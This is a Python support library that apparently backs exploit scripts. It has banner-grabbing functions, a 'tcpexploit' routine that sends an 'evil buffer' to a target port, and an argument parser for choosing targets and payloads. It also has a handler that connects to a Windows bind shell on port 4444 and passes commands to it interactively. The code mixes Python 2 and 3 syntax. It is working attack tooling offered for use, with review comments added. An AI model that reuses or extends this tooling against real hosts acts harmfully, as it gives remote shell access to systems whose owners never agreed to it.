import argparse
import os
import random
import socket
import ssl
import string
import subprocess
import sys
import time

import requests
def print_bad(msg):
    """Write *msg* to stdout as a bold red ``[-]`` status line (failure)."""
    body = " [-] %s" % msg
    sys.stdout.write("\033[1;91;40m" + body + "\033[0;37;40m\n")
def print_good(msg):
    """Write *msg* to stdout as a bold green ``[+]`` status line (success)."""
    body = " [+] %s" % msg
    sys.stdout.write("\033[1;92;40m" + body + "\033[0;37;40m\n")
def print_warning(msg):
    """Write *msg* to stdout as a bold yellow ``[!]`` status line (warning)."""
    body = " [!] %s" % msg
    sys.stdout.write("\033[1;93;40m" + body + "\033[0;37;40m\n")
def print_status(msg):
    """Write *msg* to stdout as a bold blue ``[*]`` status line (progress)."""
    body = " [*] %s" % msg
    sys.stdout.write("\033[1;94;40m" + body + "\033[0;37;40m\n")
def randomstring(length):
    """Return a string of *length* random lowercase ASCII letters.

    Drawn from ``random`` (a PRNG), so the result is fine for filler
    but not for anything that must be unpredictable, such as tokens.
    """
    alphabet = string.ascii_lowercase
    letters = []
    for _ in range(length):
        letters.append(random.choice(alphabet))
    return "".join(letters)
def handler( HOST, PAYLOAD ):
    """Interactive console for the 'win32bind' / 'win32prebind' payloads.

    Only acts when PAYLOAD is one of those two strings; for any other
    value the function does nothing and returns None.  It connects to
    (HOST, 4444), retrying up to 10 times one second apart, prints the
    first bytes received, then loops relaying socket output to stdout
    and stdin lines (terminated with "\\r\\n") back to the socket.

    Python 2 only: it uses raw_input(), the print statement and str on
    the socket.  Both bare ``except:`` clauses also swallow
    KeyboardInterrupt, and ``exit()`` terminates the whole process from
    inside a library function rather than returning to the caller.
    """
    if PAYLOAD == 'win32bind' or PAYLOAD == 'win32prebind':
        client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Connection attempts made so far; give up after the 10th failure.
        count = 1
        while True:
            try:
                # Connect to target host
                client.connect((HOST, 4444))
                print_good("Got our shell!\n")
                # 1 s timeout: any later idle recv() raises socket.timeout,
                # which the relay loop below uses as its cue to read stdin.
                client.settimeout(1)
                data = client.recv(1024)
                sys.stdout.write(data)
                sys.stdout.flush()
            except socket.error:
                # socket.timeout is a socket.error too, so a silent peer
                # after a successful connect() also lands here and retries
                # connect() on the already-connected socket.
                if count == 10:
                    print_bad("Shell is not listening?")
                    exit()
                count = count + 1
                time.sleep(1)
                continue
            break
        # NOTE(review): original indentation was lost; this loop is placed
        # inside the payload check because it uses `client` from above.
        while True:
            try:
                data = client.recv(1024)
                sys.stdout.write(data)
                sys.stdout.flush()
            except:
                # No data within the timeout (or any other error): read one
                # line from the operator and forward it with CRLF.
                try:
                    client.sendall(raw_input(""))
                    client.sendall("\r\n")
                except:
                    client.close()
                    print "Socket closed!"
                    exit()
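def bannercheck( HOST, PORT ):
    """Connect to HOST:PORT and return the first bytes the service sends.

    Args:
        HOST: hostname or IP address to connect to.
        PORT: TCP port (int).

    Returns:
        Up to 1024 raw bytes received from the service, or False when the
        connection or the read fails; the error is printed to stdout.

    Note:
        No socket timeout is set, so recv() blocks indefinitely against a
        service that never sends a banner.
    """
    s = None
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(( HOST, PORT ))
        return s.recv(1024)
    except Exception as error:
        # print() with a single argument is valid on Python 2 and 3.
        print(error)
        return False
    finally:
        # Always release the socket, including on the error path
        # (the original leaked it when connect() or recv() raised).
        if s is not None:
            s.close()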
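def bannercheckhttp( HOST, PORT ):
    """Send a minimal plaintext ``GET /`` to HOST:PORT and return the response start.

    Args:
        HOST: hostname or IP address; also used as the Host header value.
        PORT: TCP port (int).

    Returns:
        Up to 1024 raw bytes of the HTTP response, or False on any error;
        the error is printed to stdout.

    Note:
        The request is encoded explicitly so the function also works on
        Python 3, where sockets only accept bytes (the original passed a
        str, which always fails there).  No socket timeout is set.
    """
    s = None
    try:
        request = ('GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % HOST).encode('ascii')
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(( HOST, PORT ))
        # sendall() retries partial writes; send() may deliver only a prefix.
        s.sendall(request)
        return s.recv(1024)
    except Exception as error:
        print(error)
        return False
    finally:
        # Release the socket on every path; the original leaked it on error.
        if s is not None:
            s.close()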
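def bannercheckhttps( HOST, PORT ):
    """Send a minimal ``GET /`` to HOST:PORT over TLS and return the response start.

    The original body was a copy of bannercheckhttp() and sent the request
    in plaintext, which an HTTPS listener answers with a TLS alert, so it
    could never return a banner.  A default SSL context is used: the
    server certificate is verified against the system trust store and the
    hostname is checked.  A self-signed or mismatched certificate is
    therefore reported as an error (False) rather than silently accepted.

    Args:
        HOST: hostname or IP address; used for SNI/hostname check and the
            Host header.
        PORT: TCP port (int).

    Returns:
        Up to 1024 raw bytes of the HTTP response, or False on any error;
        the error is printed to stdout.  No socket timeout is set.
    """
    s = None
    try:
        request = ('GET / HTTP/1.1\r\nHost: %s\r\n\r\n' % HOST).encode('ascii')
        context = ssl.create_default_context()
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # Rebind so the finally clause closes the wrapped socket.
        s = context.wrap_socket(s, server_hostname=HOST)
        # connect() on an SSLSocket performs the handshake.
        s.connect(( HOST, PORT ))
        s.sendall(request)
        return s.recv(1024)
    except Exception as error:
        print(error)
        return False
    finally:
        if s is not None:
            s.close()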
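def tcpexploit( HOST, PORT, SPLOITSTRING ):
    """Connect to HOST:PORT, read the banner, send SPLOITSTRING and disconnect.

    Args:
        HOST: hostname or IP address.
        PORT: TCP port (int).
        SPLOITSTRING: the buffer to send (bytes on Python 3).

    Returns:
        True when the buffer was handed to the socket layer without error,
        False otherwise (the error is printed to stdout).  A True result
        says nothing about how the remote service reacted.

    Note:
        No socket timeout is set, so the banner recv() can block forever.
    """
    print_status("Connecting to %s on port %s" % ( HOST, PORT ))
    s = None
    try:
        s = socket.socket( socket.AF_INET, socket.SOCK_STREAM )
        s.connect(( HOST, PORT ))
        s.recv( 1024 )
        print_status("Sending evil buffer")
        # sendall() retries partial writes; send() may deliver only a prefix.
        s.sendall( SPLOITSTRING )
        return True
    except Exception as error:
        print(error)
        return False
    finally:
        # Release the socket on every path; the original leaked it on error.
        if s is not None:
            s.close()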
def arguments():
    """Build the command-line parser shared by the exploit scripts.

    All option values are kept as strings (``--port`` is not converted to
    int); callers convert as needed.  ``--args`` collects everything after
    it into PARGS via argparse.REMAINDER.  The parser is returned, not
    parsed, so scripts can add their own options first.
    """
    example = 'Example: %s --rhost 192.168.56.101 --target 0 --payload win32bind' % sys.argv[0]
    parser = argparse.ArgumentParser(add_help=True, epilog=example)

    valued = [
        ('--rhost', 'RHOST', 'Target IP / Hostname'),
        ('--port', 'PORT', 'Target service port'),
        ('--payload', 'PAYLOAD', 'Shellcode to use'),
    ]
    for flag, dest, text in valued:
        parser.add_argument(flag, dest=dest, help=text)

    parser.add_argument('--args', dest='PARGS', nargs=argparse.REMAINDER)

    switches = [
        ('--force', 'Ignore all checks and send the exploit'),
        ('--check', 'Do not exploit vulnerable target'),
        ('--targets', 'Print available targets'),
    ]
    for flag, text in switches:
        parser.add_argument(flag, action='store_true', help=text)

    parser.add_argument('--target', dest='TARGET', help='Set the target version')
    return parser